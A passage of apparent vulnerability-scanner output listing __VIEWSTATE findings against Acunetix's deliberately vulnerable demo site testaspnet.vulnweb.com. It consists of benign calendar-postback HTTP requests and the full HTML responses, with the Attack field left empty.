align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8342&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDA2lkuvdoIZGRk9fJ5nded%2Fvo%2BYllnIuXVOWmbBzo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLqs%2FvxDgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA1jpKvVCHuhLHEANz8ihOw%2Fn7sNx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:28 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDA2lkuvdoIZGRk9fJ5nded/vo+YllnIuXVOWmbBzo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLqs/vxDgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA1jpKvVCHuhLHEANz8ihOw/n7sNx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:White" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8358&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAdgDBydoIZGRkAOpPgDDfxcwHJZ%2B6R8HzVS6AbzY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLy8oy5AQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA2pi4O4BN3vBVgwfq6NqsRtXiMwm
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:34:59 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDAdgDBydoIZGRkAOpPgDDfxcwHJZ+6R8HzVS6AbzY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLy8oy5AQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA2pi4O4BN3vBVgwfq6NqsRtXiMwm" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:White" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a 